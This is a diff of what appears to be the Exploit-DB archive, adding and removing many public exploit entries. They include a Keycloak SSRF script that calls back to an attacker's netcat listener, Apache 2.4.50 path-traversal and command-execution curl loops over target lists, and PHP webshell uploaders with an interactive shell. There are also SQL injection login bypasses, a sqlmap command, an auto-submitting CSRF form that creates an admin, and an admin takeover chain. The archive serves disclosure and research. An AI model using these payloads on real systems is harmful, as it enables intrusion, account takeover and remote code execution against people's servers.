 Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) -  fix is provided with a CLI option > configure > administration > enforce-http-host-check,  to avoid Host header redirection.
 Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products.
 https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
 *************************************************************************************************************************************
--- a/exploits/java/webapps/50405.py
+++ b/exploits/java/webapps/50405.py
@ -0,0 +1,52 @@
 # Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
 # Date: 2021-10-09
 # Exploit Author: Mayank Deshmukh
 # Vendor Homepage: https://www.keycloak.org/
 # Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
 # Version: versions < 12.0.2
 # Tested on: Kali Linux
 # CVE : CVE-2020-10770
 #!/usr/bin/env python3
 import argparse, textwrap
 import requests
 import sys
 parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter,
 epilog=textwrap.dedent('''
 Exploit Usage :
 ./exploit.py -u http://127.0.0.1:8080
 [^] Input Netcat host:port -> 192.168.0.1:4444
 '''))
 parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
 args = parser.parse_args()
 if len(sys.argv) <= 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
    sys.exit()
 # Variables
 Host = args.url
 r = requests.session()
 def ssrf():
    headerscontent = {
            'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
                     }
    hook = input("[^] Input Netcat host:port -> ")
    _req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
    return True
 if __name__ == "__main__":
    print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ')
    try:
        if ssrf() == True:
            print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ')
    except Exception as ex:
        print('\n[-] Invalid URL or Target not Vulnerable')
--- a/exploits/jsp/webapps/47179.py
+++ b/exploits/jsp/webapps/47179.py
@ -1,4 +1,4 @@
-# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (POC)
+# Exploit Title: Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)
 # Date: 26-6-2019
 # Exploit Author: Wietse Boonstra
 # Vendor Homepage: https://ahsay.com
@ -7,23 +7,10 @@
 # Tested on: Windows / Linux
 # CVE : CVE-2019-10267
 # Session cookies are reflected in the JavaScript url:
 #!/usr/bin/env python3
 """
 # Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50.
 # Date: 26-6-2019
 # Exploit Author: Wietse Boonstra
 # Vendor Homepage: https://ahsay.com
 # Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
 # Version: 7.x < 8.1.1.50
 # Tested on: Windows / Linux
 # CVE : CVE-2019-10267
 Session cookies are reflected in the JavaScript url:
 """
 import urllib3
 import argparse
 import base64
@ -412,7 +399,7 @@ if __name__ == "__main__":
            url = url.rstrip('/')
            username = args.username
            password = args.password
-            e = Exploit(url,username,password,"http://localhost:8080")
+            e = Exploit(url,username,password) #Include proxy option inside brackets if required -> "http://localhost:8080"
            if args.check:
                e.checkTrialAccount()
            elif args.add:
--- a/exploits/multiple/webapps/50383.sh
+++ b/exploits/multiple/webapps/50383.sh
@ -16,7 +16,7 @@ exit
 fi
 for host in $(cat $1); do
 echo $host
-curl --proxy http://192.168.72.1:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
 # PoC.sh targets.txt /etc/passwd
 # PoC.sh targets.txt /bin/sh whoami
--- a/exploits/multiple/webapps/50406.sh
+++ b/exploits/multiple/webapps/50406.sh
@ -0,0 +1,24 @@
 # Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
 # Date: 10/05/2021
 # Exploit Author: Lucas Souza https://lsass.io
 # Vendor Homepage:  https://apache.org/
 # Version: 2.4.50
 # Tested on: 2.4.50
 # CVE : CVE-2021-42013
 # Credits: Ash Daulton and the cPanel Security Team
 #!/bin/bash
 if [[ $1 == '' ]]; [[ $2 == '' ]]; then
 echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
 echo ./PoC.sh targets.txt /etc/passwd
 echo ./PoC.sh targets.txt /bin/sh id
 exit
 fi
 for host in $(cat $1); do
 echo $host
 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done
 # PoC.sh targets.txt /etc/passwd
 # PoC.sh targets.txt /bin/sh whoami
--- a/exploits/multiple/webapps/50413.txt
+++ b/exploits/multiple/webapps/50413.txt
@ -0,0 +1,14 @@
 # Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
 # Shodan Dork: Search Logitech Media Server
 # Date: 12.10.2021
 # Exploit Author: Mert Das
 # Vendor Homepage: www.logitech.com
 # Version: 8.2.0
 # Tested on: Windows 10, Linux
 POC:
 1. Go to Settings / Interface tab
 2. Add payload to Title section
 3. Payload : "><img src=1 onerror=alert(1)>
 4. Alert will popup
--- a/exploits/php/webapps/50248.txt
+++ b/exploits/php/webapps/50248.txt
@ -1,192 +0,0 @@
 # Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
 # Date: April 8, 2021
 # Exploit Author: Vishwaraj101
 # Vendor Homepage: https://www.dolibarr.org/
 # Affected Version: <= 14.0.1
 # Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
 *Summary:*
 Using the below chain of issues attacker can compromise any dolibarr
 user account including the admin.
 *Poc:*
   1. Visit https://example.com/api/index.php/login?login=demo&password=demo
   try to login with a test user with 0 permissons or less permissions.
   2. We will receive an api token in return.
   3. Next we need to fetch the user id of the user whose account we want
   to own.
 *First we need to fetch the user id of the admin user using the below api.*
 *Request1:*
 GET /api/index.php/users/login/admin HTTP/1.1Host:
 preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
 root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
 application/json
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
 *This will return the user details using the username. Now update the
 victim user account via below api (include the json body received from the
 previous request1 and replace the email id from below json to the attacker
 controlled email)*
 *Request2:*PUT /api/index.php/users/*12* HTTP/1.1
 Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
 WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
 Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
 application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
 deflateDOLAPIKEY: test1337Origin:
 https://preview2.dolibarr.orgConnection: closeReferer:
 http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
 3221
 {
    "id": "12",
    "statut": "1",
    "employee": "1",
    "civility_code": null,
    "gender": "woman",
    "birth": 495583200,
    "email": "*attacker@example.com <attacker@example.com>*",
    "personal_email": "",
    "socialnetworks": {
        "facebook": "",
        "skype": "",
        "twitter": "",
        "linkedin": "",
        "instagram": "",
        "snapchat": "",
        "googleplus": "",
        "youtube": "",
        "whatsapp": "",
        "tumblr": "",
        "vero": "",
        "viadeo": "",
        "slack": "",
        "xing": "",
        "meetup": "",
        "pinterest": "",
        "flickr": "",
        "500px": "",
        "giphy": "",
        "gifycat": "",
        "dailymotion": "",
        "vimeo": "",
        "periscope": "",
        "twitch": "",
        "discord": "",
        "wikipedia": "",
        "reddit": "",
        "quora": "",
        "tripadvisor": "",
        "mastodon": "",
        "diaspora": "",
        "viber": ""
    },
    "job": "Admin Technical",
    "signature": "",
    "address": "",
    "zip": "",
    "town": "",
    "state_id": null,
    "state_code": null,
    "state": null,
    "office_phone": "",
    "office_fax": "",
    "user_mobile": "",
    "personal_mobile": "",
    "admin": "1",
    "login": "admin",
    "entity": "0",
    "datec": 1507187386,
    "datem": 1617819214,
    "socid": null,
    "contact_id": null,
    "fk_member": null,
    "fk_user": "11",
    "fk_user_expense_validator": null,
    "fk_user_holiday_validator": null,
    "clicktodial_url": null,
    "clicktodial_login": null,
    "clicktodial_poste": null,
    "datelastlogin": 1617816891,
    "datepreviouslogin": 1617815935,
    "datestartvalidity": "",
    "dateendvalidity": "",
    "photo": "com.jpg",
    "lang": "fr_FR",
    "rights": {
        "user": {
            "user": {},
            "self": {}
        }
    },
    "conf": {},
    "users": [],
    "parentof": null,
    "accountancy_code": "",
    "weeklyhours": "39.00000000",
    "color": "",
    "dateemployment": "",
    "dateemploymentend": "",
    "default_c_exp_tax_cat": null,
    "default_range": null,
    "fk_warehouse": null,
    "import_key": null,
    "array_options": [],
    "array_languages": null,
    "linkedObjectsIds": null,
    "canvas": null,
    "fk_project": null,
    "contact": null,
    "thirdparty": null,
    "user": null,
    "origin": null,
    "origin_id": null,
    "ref": "12",
    "ref_ext": null,
    "status": null,
    "country": null,
    "country_id": null,
    "country_code": "",
    "region_id": null,
    "barcode_type": null,
    "barcode_type_code": null,
    "barcode_type_label": null,
    "barcode_type_coder": null,
    "mode_reglement_id": null,
    "cond_reglement_id": null,
    "demand_reason_id": null,
    "transport_mode_id": null,
    "cond_reglement": null,
    "modelpdf": null,
    "last_main_doc": null,
    "fk_bank": null,
    "fk_account": null,
    "note_public": "",
    "note_private": "",
    "note": "",
    "name": null,
    "lastname": "Adminson",
    "firstname": "Alice",
    "civility_id": null,
    "date_creation": null,
    "date_validation": null,
    "date_modification": null,
    "specimen": 0,
    "alreadypaid": null,
    "liste_limit": 0
 }
 This will reset the admin email account to the attacker controlled
 email account, now using the password reset feature attacker will
 reset the admin account password and will gain access to the admin
 account.
--- a/exploits/php/webapps/50264.py
+++ b/exploits/php/webapps/50264.py
@ -1,78 +0,0 @@
 # Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)
 # Date: 03/09/2021
 # Exploit Author: a-rey
 # Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=14928
 # Version: v1.0
 # Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 import os
 import time
 import logging
 import requests
 import argparse
 BANNER = """
 ╔═════════════════════════════════════════════════════════════════════════════════════════════════╗
 ║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║
 ╚═════════════════════════════════════════════════════════════════════════════════════════════════╝
 by: \033[0m\033[1;31m █████╗      ██████╗ ███████╗██╗   ██╗\033[0m
     \033[0m\033[1;32m██╔══██╗     ██╔══██╗██╔════╝██║   ██║\033[0m
     \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝\033[0m
     \033[0m\033[1;34m██╔══██║     ██╔══██╗██╔══╝     ██╔╝  \033[0m
     \033[0m\033[1;35m██║  ██║     ██║  ██║███████╗   ██║   \033[0m
     \033[0m\033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m
 """
 def exploit(url:str, file:str, delay:int) -> None:
  if not os.path.exists(file):
    logging.error(f'webshell payload "{file}"" does not exist?')
    return
  logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
  uploadTime = int(time.time())
  r = requests.post(url + '/classes/SystemSettings.php',
    files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
    params={'f' : 'update_settings'},
    verify=False
  )
  if not r.ok:
    logging.error('HTTP upload request failed')
    return
  logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
  for i in range(uploadTime - delay, uploadTime + delay + 1):
    r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
    logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
    # NOTE: website will send redirects for all files that do not exist
    if r.status_code != 302:
      logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
      return
  logging.error('failed to find payload on target')
  logging.warning('maybe need a larger delay or uploads directory is not writable?')
  return
 if __name__ == '__main__':
  # parse arguments
  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
  parser.add_argument('-u', '--url',     help='website URL',                                                  type=str, required=True)
  parser.add_argument('-p', '--payload', help='PHP webshell file to upload',                                  type=str, required=True)
  parser.add_argument('-d', '--delay',   help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
  parser.add_argument('--debug',         help='enable debugging output',                                      action='store_true', default=False)
  args = parser.parse_args()
  # define logger
  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
  logging.SUCCESS = logging.CRITICAL + 1
  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
  # print banner
  print(BANNER)
  # run exploit
  exploit(args.url, args.payload, args.delay)
--- a/exploits/php/webapps/50308.txt
+++ b/exploits/php/webapps/50308.txt
@ -1,129 +0,0 @@
 # Exploit Title: Budget and Expense Tracker System 1.0 -  Remote Code Execution (RCE) (Unauthenticated)
 # Exploit Author: Abdullah Khawaja (hax.3xploit)
 # Date: 2021-09-21
 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
 # Version: 2.0
 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
 # Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
 # RCE via executing exploit:
    # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
    # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/
 import requests, sys, urllib, re
 import datetime
 from colorama import Fore, Back, Style
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
 print(Style.BRIGHT+"               Budget and Expense Tracker System 1.0")
 print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
 print(header)
 print(r"""
        ______ _______                         ________
        ___  //_/__  /_______ ___      _______ ______(_)_____ _
        __  ,<  __  __ \  __ `/_ | /| / /  __ `/____  /_  __ `/
        _  /| | _  / / / /_/ /__ |/ |/ // /_/ /____  / / /_/ /
        /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___  /  \__,_/
                                               /___/
                    abdullahkhawaja.com
            """)
 GREEN =  '\033[32m' # Green Text
 RED =  '\033[31m' # Red Text
 RESET = '\033[m' # reset to the defaults
 proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
 #Create a new session
 s = requests.Session()
 #Set Cookie
 cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
 LINK=input("Enter URL of The Vulnarable Application : ")
 def webshell(LINK, session):
    try:
        WEB_SHELL = LINK+'/uploads/'+filename
        getdir  = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)
 #Creating a PHP Web Shell
 phpshell  = {
               'img':
                  (
                   'shell.php',
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
                   'application/octet-stream',
                  {'Content-Disposition': 'form-data'}
                  )
             }
 # Defining value for form data
 data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'}
 def id_generator():
    x = datetime.datetime.now()
    date_string = x.strftime("%y-%m-%d %H:%M")
    date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
    timestamp = datetime.datetime.timestamp(date)
    file = int(timestamp)
    final_name = str(file)+'_shell.php'
    return final_name
 filename = id_generator()
 #Uploading Reverse Shell
 print("[*]Uploading PHP Shell For RCE...")
 upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data,  proxies=proxies)
 shell_upload = True if("1" in upload.text) else False
 u=shell_upload
 if u:
 	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
 else:
 	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
 #Executing The Webshell
 webshell(LINK, s)
--- a/exploits/php/webapps/50326.txt
+++ b/exploits/php/webapps/50326.txt
@ -1,52 +0,0 @@
 # Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
 # Exploit Author: ()t/\/\1
 # Date: 23/09/2021
 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
 # Tested on: Linux
 # Version: 2.0
 # Exploit Description:
 The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
 # PoC request
 POST /expense_budget/classes/Users.php?f=save HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://localhost/expense_budget/admin/?page=user
 X-Requested-With: XMLHttpRequest
 Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
 Content-Length: 824
 Connection: close
 Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
 -----------------------------1399170066243244238234165712
 Content-Disposition: form-data; name="id"
 1
 -----------------------------1399170066243244238234165712
 Content-Disposition: form-data; name="firstname"
 A
 -----------------------------1399170066243244238234165712
 Content-Disposition: form-data; name="lastname"
 a
 -----------------------------1399170066243244238234165712
 Content-Disposition: form-data; name="username"
 admin
 -----------------------------1399170066243244238234165712
 Content-Disposition: form-data; name="password"
 -----------------------------1399170066243244238234165712
 Content-Disposition: form-data; name="img"; filename="na3na3.php"
 Content-Type: image/jpeg
 <?php echo "<pre>";system($_GET['cmd']); ?>
 -----------------------------1399170066243244238234165712--
--- a/exploits/php/webapps/50403.txt
+++ b/exploits/php/webapps/50403.txt
@ -0,0 +1,35 @@
 # Exploit Title: Simple Payroll System 1.0 - SQLi Authentication Bypass
 # Date: 2021-10-09
 # Exploit Author: Yash Mahajan
 # Vendor Homepage: https://www.sourcecodester.com/php/14974/simple-payroll-system-dynamic-tax-bracket-php-using-sqlite-free-source-code.html
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple_payroll_0.zip
 # Version: 1.0
 # Tested on: Windows 10
 # Description: Simple Payroll System v1.0 Login page can be bypassed with a SQLi into the username parameter.
 Steps To Reproduce:
 1 - Navigate to http://localhost/simple_payroll/admin/login.php
 2 - Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
 3 - Click on "Login" button and you are logged in as administrator.
 Proof Of Concept:
 POST /simple_payroll/Actions.php?a=login HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 37
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/simple_payroll/admin/login.php
 Cookie: PHPSESSID=ijad04l4pfb2oec6u2vmi4ll9p
 Sec-Fetch-Dest: empty
 Sec-Fetch-Mode: cors
 Sec-Fetch-Site: same-origin
 username='+or+1%3D1--+&password=admin
--- a/exploits/php/webapps/50404.txt
+++ b/exploits/php/webapps/50404.txt
@ -0,0 +1,46 @@
 # Title: Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
 # Exploit Author: Yash Mahajan
 # Date: 2021-10-09
 # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
 # Version: 1
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
 # Tested On: Windows 10, XAMPP
 # Vulnerable Parameters: "id" , "username"
 Steps to Reproduce:
 A) SQL Injection (Authentication Bypass)
 1) Navigate to http://localhost/employment_application/admin/login.php
 2) Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
 3) Click on "Login" button and you are logged in as administrator.
 Request:
 ========
 POST /employment_application/Actions.php?a=login HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 38
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/employment_application/admin/login.php
 Cookie: PHPSESSID=fk1gp1s7stu7kitjmhvjfakjqk
 Sec-Fetch-Dest: empty
 Sec-Fetch-Mode: cors
 Sec-Fetch-Site: same-origin
 username='+or+1%3D1--+-&password=admin
 --------------------------------------------------------------------------------
 B)
 1) Vulnerable Parameter: "id"
 2) Sqlmap Command to get retrieve tables from the database
 3) python sqlmap.py -u "http://localhost/employment_application/?page=view_vacancy&id=1"  --level=3 --risk=2 --banner --dbms=sqlite --tables
--- a/exploits/php/webapps/50409.html
+++ b/exploits/php/webapps/50409.html
@ -0,0 +1,33 @@
 # Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
 # Date: 10/11/2021
 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
 # Version: 1
 # Tested on: Windows 10
 Detail:
 The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using crafted post request.
 CSRF PoC:
 --------------------------------------------------------------------------------------
 <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="fullname" value="Mrt" />
      <input type="hidden" name="username" value="NewAdmin" />
      <input type="hidden" name="type" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
 </html>
 --------------------------------------------------------------------------------------
--- a/exploits/php/webapps/50410.txt
+++ b/exploits/php/webapps/50410.txt
@ -0,0 +1,87 @@
 # Exploit Title: Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass
 # Date: 11.10.2021
 # Exploit Author: Oguzhan Kara
 # Vendor Homepage: https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=14929&title=Online+Learning+System+V2+using+PHP+Free+Source+Code
 # Version: 2.0
 # Tested on: Kali Linux, Windows 10 - XAMPP
 # Online Learning System v2.0 Login pages can be bypassed with a simple SQLi to the username/facultyID/studentID parameters.
 Steps To Reproduce:
 1 - Go to one of the login portals
 2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes ("bypass" is can be anything in this scenario) and type anything you want to the password field.
 3 - Click on "Login" button and you are logged in as first user in database, which is admin user for admin portal.
 PoC
 ---Admin Portal---
 POST /elearning/classes/Login.php?f=login HTTP/1.1
 Host: localhost
 Content-Length: 45
 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
 Accept: */*
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
 sec-ch-ua-platform: "Windows"
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/elearning/admin/login.php
 Accept-Encoding: gzip, deflate
 Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
 Connection: close
 username=bypass'+or+1%3D1--+-&password=bypass
 ---Faculty Portal---
 POST /elearning/classes/Login.php?f=flogin HTTP/1.1
 Host: localhost
 Content-Length: 47
 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
 Accept: */*
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
 sec-ch-ua-platform: "Windows"
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/elearning/faculty/login.php
 Accept-Encoding: gzip, deflate
 Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
 Connection: close
 faculty_id=bypass'+or+1%3D1--+-&password=bypass
 ---Student Portal---
 POST /elearning/classes/Login.php?f=slogin HTTP/1.1
 Host: localhost
 Content-Length: 45
 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
 Accept: */*
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
 sec-ch-ua-platform: "Windows"
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/elearning/student/login.php
 Accept-Encoding: gzip, deflate
 Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
 Connection: close
 student_id=bypass'+or+1%3D1--+-&password=test
--- a/exploits/php/webapps/50411.txt
+++ b/exploits/php/webapps/50411.txt
@ -0,0 +1,34 @@
 # Exploit Title: Simple Issue Tracker System 1.0 - SQLi Authentication Bypass
 # Date: 11.10.2021
 # Exploit Author: Bekir Bugra TURKOGLU
 # Vendor Homepage: https://www.sourcecodester.com/php/14938/simple-issue-tracker-system-project-using-php-and-sqlite-free-download.html
 # Software Link: https://www.sourcecodester.com/download-code?nid=14938&title=Simple+Issue+Tracker+System+Project+using+PHP+and+SQLite+Source+Code+Free+Download
 # Version: 1.0
 # Tested on: Windows 10, Kali Linux
